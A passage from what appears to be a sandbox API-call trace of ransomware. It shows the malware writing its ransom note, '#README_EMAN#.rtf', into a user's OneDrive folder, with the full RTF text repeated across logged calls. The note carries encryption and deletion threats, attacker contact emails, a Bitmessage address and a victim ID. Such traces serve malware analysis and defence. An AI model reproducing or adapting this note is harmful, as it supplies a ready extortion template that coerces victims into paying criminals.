g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nûê9ÿâ\x8c\x9b\x8b­¹Åü\x03§#-*\n5\x90W\x1e\x1fc\x9e", lpUsedDefaultChar=0x0) returned 8717 [0295.896] WriteFile (in: hFile=0x2ec, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.897] CloseHandle (hObject=0x2ec) returned 1 [0295.897] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\controls.2\\#readme_eman#.rtf")) returned 0xffffffff [0295.897] GetLastError () returned 0x2 [0295.897] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\controls.2\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.898] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur 